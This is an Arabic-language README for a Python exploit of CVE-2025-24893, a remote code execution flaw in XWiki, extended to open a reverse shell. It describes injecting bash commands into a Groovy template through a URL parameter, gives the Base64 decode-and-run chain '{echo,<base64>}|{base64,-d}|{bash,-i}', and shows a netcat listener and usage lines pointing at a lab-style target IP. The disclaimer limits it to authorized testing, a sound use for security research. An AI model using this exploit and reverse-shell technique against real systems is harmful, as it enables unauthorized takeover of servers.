
CVE-2025-24893 استغلال RCE لـ XWiki مع إمكانية الصدفة العكسية
إخلاء مسؤولية: هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط. لا تستخدمها على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها. الاستخدام الخاطئ قد يكون غير قانوني وخطير.
يستغل هذا السكريبت بلغة بايثون CVE-2025-24893، وهي ثغرة تنفيذ أوامر عن بُعد تؤثر على إصدارات XWiki حتى 15.10.10.
هذه النسخة توسع الإثبات الأولي (PoC) من قبل أل بارادي جوي لإطلاق شيل عكسي. يمكن العثور على الإثبات الأولي هنا.
يقوم XWiki بتنفيذ كود Groovy عبر معامل URL.
يقوم الاستغلال بحقن bash -c داخل قالب Groovy هذا.
تحتوي الشيل العكسي العادي على علامات اقتباس متعددة (' و ") قد تؤدي إلى كسر تقييم Groovy وعنوان URL.
لحل هذه المشكلة، يقوم السكريبت بتشفير أمر الشيل في سطر واحد باستخدام Base64.
ثم يتم إرسال الحمولة في عنوان URL وتنفيذها باستخدام السلسلة التالية:
{echo,<base64>} | {base64,-d} | {bash,-i}
يقوم هذا بفك تشفير حمولة Base64 بأمان وتنفيذها مع bash -i، مما يعطي شيل عكسي تفاعلي.
http://<target-host>/ في النهاية/xwiki (السكريبت يضيفه تلقائيًا)أمثلة:
# Correct
http://10.129.95.114:8080
http://example.com:8080
# Incorrect
http://10.129.95.114:8080/ # trailing slash
http://example.com/xwiki # includes /xwiki
قبل تشغيل الاستغلال، يجب بدء مستمع على جهازك لاستقبال الشيل العكسي.
مثال باستخدام Netcat:
nc -lvnp <lport>
<lport> مع المنفذ الذي تقدمه كوسيطة للسكريبت.python3 cve-2025-24893.py <target_base_url> <lhost> <lport>
مثال:
python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444